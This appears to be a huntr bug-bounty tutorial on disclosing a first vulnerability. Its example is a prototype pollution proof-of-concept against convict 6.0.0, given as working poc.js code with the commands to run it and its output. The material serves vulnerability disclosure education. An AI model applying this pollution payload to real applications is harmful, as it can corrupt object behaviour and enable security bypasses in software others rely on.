Submitting your first vulnerability disclosure

It can be daunting to find and disclose a vulnerability in an open source repository. To help you, we have put together a simple walkthrough to help you find and submit your first vulnerability with huntr.

Walkthrough

In our walkthrough, we will take a look at a Prototype Pollution vulnerability that was found, disclosed and patched by our community. If you want to skip this walkthrough and view the patch, click here.

In this walkthrough, we will be taking a look at a Prototype Pollution vulnerability in mozilla/node-convict, a repository curated and maintained by Mozilla.

Installing a package

Firstly, we want to install the vulnerable package inside of our terminal. If you have Node.js on your computer, you can install the package with npm:

$ npm install convict@6.0.0 # vulnerable version

If you have any trouble with this step, please read here.

Create a proof-of-concept

Now that you have the vulnerable package installed on your computer, create a proof-of-concept in the same directory where you installed the package. You can call it poc.js (a JavaScript file):

var convict = require('convict'); // import the vulnerable package
var obj = {}; // create an object payload
var config = convict(obj); // insert the payload as a parameter

console.log('Before : ' + {}.polluted); // before vulnerability
config.set('__proto__.polluted', 'Yes! Its Polluted'); // execute payload
console.log('After : ' + {}.polluted); // vulnerability

Execute the proof-of-concept

Now that you have created your proof-of-concept, you can execute it with:

node ./poc.js # Run the proof-of-concept

Check the result

In your terminal, you should now the see the result of your proof-of-concept:

Before : undefined
After : Yes! Its Polluted

You have now demonstrated a prototype pollution. If you want to see the fix for this vulnerability, click here.

Conclusion

It is now time for you to find your first Prototype Pollution vulnerability. By following a similar workflow with a different package, you can spot your first vulnerability and disclose it with our form.

If you found this walkthrough helpful or have any feedback, we would love to hear your thoughts on our Twitter.

Did you find this walkthrough helpful? 🤔